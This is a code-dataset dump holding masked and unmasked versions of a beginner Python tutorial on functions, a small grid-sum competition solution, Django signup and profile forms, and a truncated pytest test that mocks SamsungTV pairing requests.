"step-2": "<mask token>\n\n\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\n\n<mask token>\n\n\ndef quadratic(a, b, c):\n if not isinstance(a, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(b, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(c, (int, float)):\n raise TypeError('a is not a number')\n d = b * b - 4 * a * c\n if a == 0:\n if b == 0:\n if c == 0:\n return '方程根为全体实数'\n else:\n return '方程无根'\n else:\n x1 = -c / b\n x2 = x1\n return x1, x2\n elif d < 0:\n return '方程无根'\n else:\n x1 = (-b + math.sqrt(d)) / 2 / a\n x2 = (-b - math.sqrt(d)) / 2 / a\n return x1, x2\n\n\n<mask token>\n\n\ndef power(x):\n return x * x\n\n\n<mask token>\n\n\ndef powerThree(x, n=2):\n s = 1\n while n > 0:\n n = n - 1\n s = s * x\n return s\n\n\n<mask token>\n\n\ndef enroll(name, gender, age=6, city='Beijing'):\n print('name:', name)\n print('gender', gender)\n print('age', age)\n print('city', city)\n\n\n<mask token>\n\n\ndef add_end(l=None):\n if l is None:\n l = []\n l.append('END')\n return l\n\n\n<mask token>\n\n\ndef calcTwo(*numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\n\n<mask token>\n\n\ndef person(name, age, **kw):\n print('name:', name, 'age:', age, 'other:', kw)\n\n\n<mask token>\n\n\ndef person(name, age, **kw):\n if 'city' in kw:\n pass\n if 'job' in kw:\n pass\n print('name:', name, 'age:', age, 'other:', kw)\n\n\n<mask token>\n\n\ndef personThree(name, age, *args, city, job):\n print(name, age, args, city, job)\n\n\ndef personFour(name, age, *, city='beijing', job):\n print(name, age, city, job)\n\n\n<mask token>\n\n\ndef personFive(name, age, city, job):\n pass\n\n\ndef f1(a, b, c=0, *args, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)\n\n\ndef f2(a, b, c=0, *, d, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\n\n<mask token>\n\n\ndef quadratic(a, b, c):\n if not isinstance(a, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(b, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(c, (int, float)):\n raise TypeError('a is not a number')\n d = b * b - 4 * a * c\n if a == 0:\n if b == 0:\n if c == 0:\n return '方程根为全体实数'\n else:\n return '方程无根'\n else:\n x1 = -c / b\n x2 = x1\n return x1, x2\n elif d < 0:\n return '方程无根'\n else:\n x1 = (-b + math.sqrt(d)) / 2 / a\n x2 = (-b - math.sqrt(d)) / 2 / a\n return x1, x2\n\n\n<mask token>\n\n\ndef power(x):\n return x * x\n\n\n<mask token>\n\n\ndef powerThree(x, n=2):\n s = 1\n while n > 0:\n n = n - 1\n s = s * x\n return s\n\n\n<mask token>\n\n\ndef enroll(name, gender, age=6, city='Beijing'):\n print('name:', name)\n print('gender', gender)\n print('age', age)\n print('city', city)\n\n\n<mask token>\n\n\ndef add_end(l=None):\n if l is None:\n l = []\n l.append('END')\n return l\n\n\n<mask token>\n\n\ndef calc(numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\n\n<mask token>\n\n\ndef calcTwo(*numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\n\n<mask token>\n\n\ndef person(name, age, **kw):\n print('name:', name, 'age:', age, 'other:', kw)\n\n\n<mask token>\n\n\ndef person(name, age, **kw):\n if 'city' in kw:\n pass\n if 'job' in kw:\n pass\n print('name:', name, 'age:', age, 'other:', kw)\n\n\n<mask token>\n\n\ndef personThree(name, age, *args, city, job):\n print(name, age, args, city, job)\n\n\ndef personFour(name, age, *, city='beijing', job):\n print(name, age, city, job)\n\n\n<mask token>\n\n\ndef personFive(name, age, city, job):\n pass\n\n\ndef f1(a, b, c=0, *args, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)\n\n\ndef f2(a, b, c=0, *, d, **kw):\n print('a=', a, 
'b=', b, 'c=', c, 'd=', d, 'kw=', kw)\n\n\n<mask token>\n",
"step-4": "print(abs(100))\nprint(abs(-20))\nprint(abs(12.34))\nprint(max(1, 2))\nprint(max(1, 2, 3, -5))\nprint(int('123'))\nprint(int(12.34))\nprint(float('12.34'))\nprint(str(1.23))\nprint(str(100))\nprint(bool(1))\nprint(bool(''))\na = abs\nprint(a(-1))\nn1 = 255\nn2 = 1000\nprint(hex(255))\nprint(hex(1000))\nfrom abstest import my_abs\nprint(my_abs(-2))\n<mask token>\nimport math\n\n\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\n\nx, y = move(100, 100, 60, math.pi / 6)\nprint(x, y)\nr = move(100, 100, 60, math.pi / 6)\nprint(r)\n\n\ndef quadratic(a, b, c):\n if not isinstance(a, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(b, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(c, (int, float)):\n raise TypeError('a is not a number')\n d = b * b - 4 * a * c\n if a == 0:\n if b == 0:\n if c == 0:\n return '方程根为全体实数'\n else:\n return '方程无根'\n else:\n x1 = -c / b\n x2 = x1\n return x1, x2\n elif d < 0:\n return '方程无根'\n else:\n x1 = (-b + math.sqrt(d)) / 2 / a\n x2 = (-b - math.sqrt(d)) / 2 / a\n return x1, x2\n\n\nprint(quadratic(2, 3, 1))\nprint(quadratic(0, 0, 0))\n\n\ndef power(x):\n return x * x\n\n\nprint(power(4))\nprint(power(-2))\n\n\ndef powerThree(x, n=2):\n s = 1\n while n > 0:\n n = n - 1\n s = s * x\n return s\n\n\nprint(powerThree(5, 3))\nprint(powerThree(5))\n\n\ndef enroll(name, gender, age=6, city='Beijing'):\n print('name:', name)\n print('gender', gender)\n print('age', age)\n print('city', city)\n\n\nprint(enroll('Sarah', 'F'))\n\n\ndef add_end(l=None):\n if l is None:\n l = []\n l.append('END')\n return l\n\n\nprint(add_end([1, 2, 3]))\nprint(add_end())\nprint(add_end())\nprint(add_end())\n\n\ndef calc(numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\n\nprint(calc([1, 2, 3]))\nprint(calc((1, 2, 3)))\n\n\ndef calcTwo(*numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return 
sum\n\n\nprint(calcTwo(1, 2))\nprint(calcTwo())\nnumbers = [1, 2, 3]\nprint(calcTwo(numbers[0], numbers[1], numbers[2]))\nprint(calcTwo(*numbers))\n\n\ndef person(name, age, **kw):\n print('name:', name, 'age:', age, 'other:', kw)\n\n\nperson('michael', 30)\nperson('michael', 30, city='Beijing')\nperson('michael', 30, gender='m', job='engineer')\nextra = {'city': 'Beijing', 'job': 'engineer'}\nperson('Jack', 24, city=extra['city'], job=extra['job'])\nperson('Jack', 24, **extra)\n\n\ndef person(name, age, **kw):\n if 'city' in kw:\n pass\n if 'job' in kw:\n pass\n print('name:', name, 'age:', age, 'other:', kw)\n\n\nperson('jack', 24, city='beijing', addr='chaoyang', zipcode=123456)\n\n\ndef personTwo(name, age, *, city, job):\n print(name, age, city, job)\n\n\npersonTwo('jack', 24, city='beijing', job='engineer')\n\n\ndef personThree(name, age, *args, city, job):\n print(name, age, args, city, job)\n\n\ndef personFour(name, age, *, city='beijing', job):\n print(name, age, city, job)\n\n\npersonFour('jack', 24, job='engineer')\n\n\ndef personFive(name, age, city, job):\n pass\n\n\ndef f1(a, b, c=0, *args, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)\n\n\ndef f2(a, b, c=0, *, d, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)\n\n\nf1(1, 2)\nf1(1, 2, 3)\nf1(1, 2, 3, 'a', 'b')\nf1(1, 2, 3, 'a', 'b', x=99)\nf2(1, 2, d=99, ext=None)\nargs = 1, 2, 3, 4\nkw = {'d': 99, 'x': '#'}\nf1(*args, **kw)\nargs = 1, 2, 3\nkw = {'d': 88, 'x': '#'}\nf2(*args, **kw)\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/4/11 16:07\n# @Author : LiuZhi\n# @Site : \n# @File : Function.py\n# @Software: PyCharm\n\n#求绝对值的函数\nprint(abs(100))\nprint(abs(-20))\nprint(abs(12.34))\n\n#print(abs(1,2))\n#print(abs('q'))\n\nprint(max(1,2))\nprint(max(1,2,3,-5))\n\nprint(int('123'))\nprint(int(12.34))\nprint(float('12.34'))\nprint(str(1.23))\nprint(str(100))\nprint(bool(1))\nprint(bool(''))\n\na = abs\nprint(a(-1))\n\nn1 = 255\nn2 = 1000\nprint(hex(255))\nprint(hex(1000))\n\n\nfrom abstest import my_abs\nprint(my_abs(-2))\n#print(my_abs(-2,3))\n#print(my_abs('222'))\n'''\npass用法\ndef nop():\n pass\n\nage = 26\nif age >= 18:\n pass\n'''\nimport math\n\ndef move(x,y, step, angle = 0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx,ny\nx, y = move(100, 100, 60, math.pi/6)\nprint(x,y)\nr = move(100, 100, 60, math.pi/6)\nprint(r)\n\n#求一元二次方程的根\ndef quadratic(a, b, c):\n if not isinstance(a, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(b, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(c, (int, float)):\n raise TypeError('a is not a number')\n d = b*b - 4*a*c\n if a == 0:\n if b == 0:\n if c == 0:\n return '方程根为全体实数'\n else:\n return '方程无根'\n else:\n x1 = -c/b\n x2 = x1\n return x1, x2\n else:\n if d<0:\n return '方程无根'\n else:\n x1 = (-b + math.sqrt(d))/2/a\n x2 = (-b - math.sqrt(d))/2/a\n return x1,x2\nprint(quadratic(2, 3, 1))\nprint(quadratic(0,0,0))\n\ndef power(x):\n return x*x\n\nprint(power(4))\nprint(power(-2))\n\n#默认参数\ndef powerThree(x, n=2):\n s = 1\n while n >0 :\n n = n - 1\n s = s * x\n return s\n\nprint(powerThree(5,3))\nprint(powerThree(5))\n\ndef enroll(name, gender, age = 6, city = 'Beijing'):\n print('name:', name)\n print('gender', gender)\n print('age', age)\n print('city', city)\nprint(enroll('Sarah', 'F'))\n\ndef add_end(l=None):\n if l is None:\n l = []\n l.append('END')\n return l\nprint(add_end([1, 2, 
3]))\nprint(add_end())\nprint(add_end())\nprint(add_end())\n\n#可变参数\ndef calc(numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\nprint(calc([1, 2, 3]))\nprint(calc((1, 2, 3)))\n\ndef calcTwo(*numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\nprint(calcTwo(1,2))\nprint(calcTwo())\nnumbers = [1, 2, 3]\nprint(calcTwo(numbers[0], numbers[1], numbers[2]))\nprint(calcTwo(*numbers))\n\n#关键字参数\ndef person(name, age, **kw):\n print('name:', name, 'age:', age, 'other:', kw)\n\nperson('michael', 30)\nperson('michael', 30, city='Beijing')\nperson('michael', 30, gender='m', job='engineer')\nextra = {'city':'Beijing', 'job': 'engineer'}\nperson('Jack', 24, city = extra['city'], job = extra['job'])\nperson('Jack', 24, **extra)\n\ndef person(name, age, **kw):\n if 'city' in kw:\n pass\n if 'job' in kw:\n pass\n print('name:', name, 'age:', age, 'other:', kw)\n\nperson('jack', 24, city='beijing', addr = 'chaoyang', zipcode=123456)\ndef personTwo(name, age, *, city, job):\n print(name, age, city, job)\npersonTwo('jack', 24, city='beijing', job='engineer')\ndef personThree(name, age, *args, city, job):\n print(name, age, args, city, job)\n#personThree('jack', 24, 'beijing', 'engineer')\ndef personFour(name, age, *, city='beijing', job):\n print(name, age, city, job)\npersonFour('jack', 24, job = 'engineer')\ndef personFive(name, age, city, job):\n pass\ndef f1(a, b, c=0, *args, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)\ndef f2(a, b, c=0, *, d, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)\nf1(1, 2)\nf1(1, 2, 3)\nf1(1, 2, 3, 'a', 'b')\nf1(1, 2, 3, 'a', 'b', x=99)\nf2(1, 2, d=99, ext=None)\n\nargs = (1,2, 3, 4)\nkw = {'d':99,'x':'#'}\nf1(*args, **kw)\n\nargs = (1,2, 3)\nkw = {'d':88, 'x':'#'}\nf2(*args, **kw)\n\n\n",
"step-ids": [
9,
14,
15,
19,
20
]
}
|
[
9,
14,
15,
19,
20
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for n in range(1, T + 1):
N = int(input())
arr = [list(map(int, list(input()))) for _ in range(N)]
a = N // 2
b = N // 2
result = 0
for i in range(N):
for j in range(a, b + 1):
result += arr[i][j]
print(result)
if i < N // 2:
a += -1
b += 1
else:
a += 1
b += -1
print('#{0} {1}'.format(n, result))
<|reserved_special_token_1|>
T = int(input())
for n in range(1, T + 1):
N = int(input())
arr = [list(map(int, list(input()))) for _ in range(N)]
a = N // 2
b = N // 2
result = 0
for i in range(N):
for j in range(a, b + 1):
result += arr[i][j]
print(result)
if i < N // 2:
a += -1
b += 1
else:
a += 1
b += -1
print('#{0} {1}'.format(n, result))
<|reserved_special_token_1|>
# import sys
# sys.stdin = open("농작물input.txt")
T = int(input())
for n in range(1, T+1):
N = int(input())
arr = [list(map(int, list(input()))) for _ in range(N)]
# print(arr)
a = N//2
b = N//2
result = 0
for i in range(N):
for j in range(a, b+1):
result += arr[i][j]
print(result)
if i < N//2:
a += -1
b += 1
else:
a += 1
b += -1
print("#{0} {1}".format(n, result))
|
flexible
|
{
"blob_id": "2236591b3a30f51442beb20c6c43cc9e6cd921d2",
"index": 7530,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor n in range(1, T + 1):\n N = int(input())\n arr = [list(map(int, list(input()))) for _ in range(N)]\n a = N // 2\n b = N // 2\n result = 0\n for i in range(N):\n for j in range(a, b + 1):\n result += arr[i][j]\n print(result)\n if i < N // 2:\n a += -1\n b += 1\n else:\n a += 1\n b += -1\n print('#{0} {1}'.format(n, result))\n",
"step-3": "T = int(input())\nfor n in range(1, T + 1):\n N = int(input())\n arr = [list(map(int, list(input()))) for _ in range(N)]\n a = N // 2\n b = N // 2\n result = 0\n for i in range(N):\n for j in range(a, b + 1):\n result += arr[i][j]\n print(result)\n if i < N // 2:\n a += -1\n b += 1\n else:\n a += 1\n b += -1\n print('#{0} {1}'.format(n, result))\n",
"step-4": "# import sys\n# sys.stdin = open(\"농작물input.txt\")\n\nT = int(input())\n\nfor n in range(1, T+1):\n N = int(input())\n arr = [list(map(int, list(input()))) for _ in range(N)]\n # print(arr)\n a = N//2\n b = N//2\n result = 0\n for i in range(N):\n for j in range(a, b+1):\n result += arr[i][j]\n print(result)\n if i < N//2:\n a += -1\n b += 1\n else:\n a += 1\n b += -1\n\n print(\"#{0} {1}\".format(n, result))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class SignUpForm(UserCreationForm):
""" Sign up form fetching form the User creation form
and the email and password is necessary not the user """
class Meta:
model = User
fields = 'email', 'password1', 'password2'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProfileForm(forms.ModelForm):
<|reserved_special_token_0|>
class Meta:
model = Profile
exclude = 'user',
class SignUpForm(UserCreationForm):
""" Sign up form fetching form the User creation form
and the email and password is necessary not the user """
class Meta:
model = User
fields = 'email', 'password1', 'password2'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProfileForm(forms.ModelForm):
""" Form for the profile """
class Meta:
model = Profile
exclude = 'user',
class SignUpForm(UserCreationForm):
""" Sign up form fetching form the User creation form
and the email and password is necessary not the user """
class Meta:
model = User
fields = 'email', 'password1', 'password2'
<|reserved_special_token_1|>
from django import forms
from .models import User, Profile
from django.contrib.auth.forms import UserCreationForm
class ProfileForm(forms.ModelForm):
""" Form for the profile """
class Meta:
model = Profile
exclude = 'user',
class SignUpForm(UserCreationForm):
""" Sign up form fetching form the User creation form
and the email and password is necessary not the user """
class Meta:
model = User
fields = 'email', 'password1', 'password2'
<|reserved_special_token_1|>
from django import forms
from .models import User,Profile
from django.contrib.auth.forms import UserCreationForm
class ProfileForm(forms.ModelForm):
''' Form for the profile '''
class Meta:
model = Profile
exclude = ('user',) ## we will create the user with the signals
class SignUpForm(UserCreationForm):
''' Sign up form fetching form the User creation form
and the email and password is necessary not the user '''
class Meta:
model = User
fields = ('email','password1','password2')
|
flexible
|
{
"blob_id": "7c3569c43d27ba605c0dba420690e18d7f849965",
"index": 7372,
"step-1": "<mask token>\n\n\nclass SignUpForm(UserCreationForm):\n \"\"\" Sign up form fetching form the User creation form\n and the email and password is necessary not the user \"\"\"\n\n\n class Meta:\n model = User\n fields = 'email', 'password1', 'password2'\n",
"step-2": "<mask token>\n\n\nclass ProfileForm(forms.ModelForm):\n <mask token>\n\n\n class Meta:\n model = Profile\n exclude = 'user',\n\n\nclass SignUpForm(UserCreationForm):\n \"\"\" Sign up form fetching form the User creation form\n and the email and password is necessary not the user \"\"\"\n\n\n class Meta:\n model = User\n fields = 'email', 'password1', 'password2'\n",
"step-3": "<mask token>\n\n\nclass ProfileForm(forms.ModelForm):\n \"\"\" Form for the profile \"\"\"\n\n\n class Meta:\n model = Profile\n exclude = 'user',\n\n\nclass SignUpForm(UserCreationForm):\n \"\"\" Sign up form fetching form the User creation form\n and the email and password is necessary not the user \"\"\"\n\n\n class Meta:\n model = User\n fields = 'email', 'password1', 'password2'\n",
"step-4": "from django import forms\nfrom .models import User, Profile\nfrom django.contrib.auth.forms import UserCreationForm\n\n\nclass ProfileForm(forms.ModelForm):\n \"\"\" Form for the profile \"\"\"\n\n\n class Meta:\n model = Profile\n exclude = 'user',\n\n\nclass SignUpForm(UserCreationForm):\n \"\"\" Sign up form fetching form the User creation form\n and the email and password is necessary not the user \"\"\"\n\n\n class Meta:\n model = User\n fields = 'email', 'password1', 'password2'\n",
"step-5": "from django import forms\nfrom .models import User,Profile\nfrom django.contrib.auth.forms import UserCreationForm\n\n\nclass ProfileForm(forms.ModelForm):\n ''' Form for the profile '''\n class Meta:\n model = Profile\n exclude = ('user',) ## we will create the user with the signals\n\n\n\n\nclass SignUpForm(UserCreationForm):\n ''' Sign up form fetching form the User creation form\n and the email and password is necessary not the user '''\n class Meta:\n model = User\n fields = ('email','password1','password2')\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
"""SamsungTV Encrypted."""
import aiohttp
from aioresponses import aioresponses
import pytest
from yarl import URL
from samsungtvws.encrypted.authenticator import SamsungTVEncryptedWSAsyncAuthenticator
@pytest.mark.asyncio
async def test_authenticator(aioresponse: aioresponses) -> None:
with open("tests/fixtures/auth_pin_status.xml") as file:
aioresponse.get("http://1.2.3.4:8080/ws/apps/CloudPINPage", body=file.read())
with open("tests/fixtures/auth_pin_status.xml") as file:
aioresponse.post(
"http://1.2.3.4:8080/ws/apps/CloudPINPage",
body="http:///ws/apps/CloudPINPage/run",
)
with open("tests/fixtures/auth_empty.json") as file:
aioresponse.get(
"http://1.2.3.4:8080/ws/pairing?step=0&app_id=12345"
"&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&type=1",
body=file.read(),
)
with open("tests/fixtures/auth_generator_client_hello.json") as file:
aioresponse.post(
"http://1.2.3.4:8080/ws/pairing?step=1&app_id=12345"
"&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184",
body=file.read(),
)
with open("tests/fixtures/auth_client_ack_msg.json") as file:
aioresponse.post(
"http://1.2.3.4:8080/ws/pairing?step=2&app_id=12345"
"&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184",
body=file.read(),
)
aioresponse.delete("http://1.2.3.4:8080/ws/apps/CloudPINPage/run", body="")
authenticator = SamsungTVEncryptedWSAsyncAuthenticator(
"1.2.3.4", web_session=aiohttp.ClientSession()
)
await authenticator.start_pairing()
token = await authenticator.try_pin("0997")
assert token == "545a596ab96b289c60896255e8690288"
session_id = await authenticator.get_session_id_and_close()
assert session_id == "1"
assert len(aioresponse.requests) == 6
print(aioresponse.requests)
request = aioresponse.requests[
(
"POST",
URL(
"http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=1"
),
)
]
assert (
request[0].kwargs["data"]
== '{"auth_Data":{"auth_type":"SPC","GeneratorServerHello":'
'"010200000000000000008A000000063635343332317CAF9CBDC06B666D23EBC'
"A615E0666FEB2B807091BF507404DDD18329CD64A91E513DC704298CCE49C4C5"
"656C42141A696354A7145127BCD94CDD2B0D632D87E332437F86EBE5A50A1512"
"F3F54C71B791A88ECBAF562FBABE2731F27D851A764CA114DBE2C2C965DF151C"
'FC7401920FAA04636B356B97DBE1DA3A090004F81830000000000"}}'
)
request = aioresponse.requests[
(
"POST",
URL(
"http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=2"
),
)
]
assert (
request[0].kwargs["data"]
== '{"auth_Data":{"auth_type":"SPC","request_id":"0","ServerAckMsg":'
'"01030000000000000000145F38EAFF0F6A6FF062CA652CD6CBAD9AF1EC62470000000000"}}'
)
|
normal
|
{
"blob_id": "e1448e62020f87e315d219be97d9af84607441df",
"index": 9104,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@pytest.mark.asyncio\nasync def test_authenticator(aioresponse: aioresponses) ->None:\n with open('tests/fixtures/auth_pin_status.xml') as file:\n aioresponse.get('http://1.2.3.4:8080/ws/apps/CloudPINPage', body=\n file.read())\n with open('tests/fixtures/auth_pin_status.xml') as file:\n aioresponse.post('http://1.2.3.4:8080/ws/apps/CloudPINPage', body=\n 'http:///ws/apps/CloudPINPage/run')\n with open('tests/fixtures/auth_empty.json') as file:\n aioresponse.get(\n 'http://1.2.3.4:8080/ws/pairing?step=0&app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&type=1'\n , body=file.read())\n with open('tests/fixtures/auth_generator_client_hello.json') as file:\n aioresponse.post(\n 'http://1.2.3.4:8080/ws/pairing?step=1&app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184'\n , body=file.read())\n with open('tests/fixtures/auth_client_ack_msg.json') as file:\n aioresponse.post(\n 'http://1.2.3.4:8080/ws/pairing?step=2&app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184'\n , body=file.read())\n aioresponse.delete('http://1.2.3.4:8080/ws/apps/CloudPINPage/run', body='')\n authenticator = SamsungTVEncryptedWSAsyncAuthenticator('1.2.3.4',\n web_session=aiohttp.ClientSession())\n await authenticator.start_pairing()\n token = await authenticator.try_pin('0997')\n assert token == '545a596ab96b289c60896255e8690288'\n session_id = await authenticator.get_session_id_and_close()\n assert session_id == '1'\n assert len(aioresponse.requests) == 6\n print(aioresponse.requests)\n request = aioresponse.requests['POST', URL(\n 'http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=1'\n )]\n assert request[0].kwargs['data'\n ] == 
'{\"auth_Data\":{\"auth_type\":\"SPC\",\"GeneratorServerHello\":\"010200000000000000008A000000063635343332317CAF9CBDC06B666D23EBCA615E0666FEB2B807091BF507404DDD18329CD64A91E513DC704298CCE49C4C5656C42141A696354A7145127BCD94CDD2B0D632D87E332437F86EBE5A50A1512F3F54C71B791A88ECBAF562FBABE2731F27D851A764CA114DBE2C2C965DF151CFC7401920FAA04636B356B97DBE1DA3A090004F81830000000000\"}}'\n request = aioresponse.requests['POST', URL(\n 'http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=2'\n )]\n assert request[0].kwargs['data'\n ] == '{\"auth_Data\":{\"auth_type\":\"SPC\",\"request_id\":\"0\",\"ServerAckMsg\":\"01030000000000000000145F38EAFF0F6A6FF062CA652CD6CBAD9AF1EC62470000000000\"}}'\n",
"step-3": "<mask token>\nimport aiohttp\nfrom aioresponses import aioresponses\nimport pytest\nfrom yarl import URL\nfrom samsungtvws.encrypted.authenticator import SamsungTVEncryptedWSAsyncAuthenticator\n\n\n@pytest.mark.asyncio\nasync def test_authenticator(aioresponse: aioresponses) ->None:\n with open('tests/fixtures/auth_pin_status.xml') as file:\n aioresponse.get('http://1.2.3.4:8080/ws/apps/CloudPINPage', body=\n file.read())\n with open('tests/fixtures/auth_pin_status.xml') as file:\n aioresponse.post('http://1.2.3.4:8080/ws/apps/CloudPINPage', body=\n 'http:///ws/apps/CloudPINPage/run')\n with open('tests/fixtures/auth_empty.json') as file:\n aioresponse.get(\n 'http://1.2.3.4:8080/ws/pairing?step=0&app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&type=1'\n , body=file.read())\n with open('tests/fixtures/auth_generator_client_hello.json') as file:\n aioresponse.post(\n 'http://1.2.3.4:8080/ws/pairing?step=1&app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184'\n , body=file.read())\n with open('tests/fixtures/auth_client_ack_msg.json') as file:\n aioresponse.post(\n 'http://1.2.3.4:8080/ws/pairing?step=2&app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184'\n , body=file.read())\n aioresponse.delete('http://1.2.3.4:8080/ws/apps/CloudPINPage/run', body='')\n authenticator = SamsungTVEncryptedWSAsyncAuthenticator('1.2.3.4',\n web_session=aiohttp.ClientSession())\n await authenticator.start_pairing()\n token = await authenticator.try_pin('0997')\n assert token == '545a596ab96b289c60896255e8690288'\n session_id = await authenticator.get_session_id_and_close()\n assert session_id == '1'\n assert len(aioresponse.requests) == 6\n print(aioresponse.requests)\n request = aioresponse.requests['POST', URL(\n 'http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=1'\n )]\n assert request[0].kwargs['data'\n ] == 
'{\"auth_Data\":{\"auth_type\":\"SPC\",\"GeneratorServerHello\":\"010200000000000000008A000000063635343332317CAF9CBDC06B666D23EBCA615E0666FEB2B807091BF507404DDD18329CD64A91E513DC704298CCE49C4C5656C42141A696354A7145127BCD94CDD2B0D632D87E332437F86EBE5A50A1512F3F54C71B791A88ECBAF562FBABE2731F27D851A764CA114DBE2C2C965DF151CFC7401920FAA04636B356B97DBE1DA3A090004F81830000000000\"}}'\n request = aioresponse.requests['POST', URL(\n 'http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=2'\n )]\n assert request[0].kwargs['data'\n ] == '{\"auth_Data\":{\"auth_type\":\"SPC\",\"request_id\":\"0\",\"ServerAckMsg\":\"01030000000000000000145F38EAFF0F6A6FF062CA652CD6CBAD9AF1EC62470000000000\"}}'\n",
"step-4": "\"\"\"SamsungTV Encrypted.\"\"\"\nimport aiohttp\nfrom aioresponses import aioresponses\nimport pytest\nfrom yarl import URL\n\nfrom samsungtvws.encrypted.authenticator import SamsungTVEncryptedWSAsyncAuthenticator\n\n\n@pytest.mark.asyncio\nasync def test_authenticator(aioresponse: aioresponses) -> None:\n with open(\"tests/fixtures/auth_pin_status.xml\") as file:\n aioresponse.get(\"http://1.2.3.4:8080/ws/apps/CloudPINPage\", body=file.read())\n with open(\"tests/fixtures/auth_pin_status.xml\") as file:\n aioresponse.post(\n \"http://1.2.3.4:8080/ws/apps/CloudPINPage\",\n body=\"http:///ws/apps/CloudPINPage/run\",\n )\n with open(\"tests/fixtures/auth_empty.json\") as file:\n aioresponse.get(\n \"http://1.2.3.4:8080/ws/pairing?step=0&app_id=12345\"\n \"&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&type=1\",\n body=file.read(),\n )\n with open(\"tests/fixtures/auth_generator_client_hello.json\") as file:\n aioresponse.post(\n \"http://1.2.3.4:8080/ws/pairing?step=1&app_id=12345\"\n \"&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184\",\n body=file.read(),\n )\n with open(\"tests/fixtures/auth_client_ack_msg.json\") as file:\n aioresponse.post(\n \"http://1.2.3.4:8080/ws/pairing?step=2&app_id=12345\"\n \"&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184\",\n body=file.read(),\n )\n aioresponse.delete(\"http://1.2.3.4:8080/ws/apps/CloudPINPage/run\", body=\"\")\n\n authenticator = SamsungTVEncryptedWSAsyncAuthenticator(\n \"1.2.3.4\", web_session=aiohttp.ClientSession()\n )\n await authenticator.start_pairing()\n token = await authenticator.try_pin(\"0997\")\n assert token == \"545a596ab96b289c60896255e8690288\"\n\n session_id = await authenticator.get_session_id_and_close()\n assert session_id == \"1\"\n\n assert len(aioresponse.requests) == 6\n print(aioresponse.requests)\n\n request = aioresponse.requests[\n (\n \"POST\",\n URL(\n \"http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=1\"\n ),\n )\n ]\n assert 
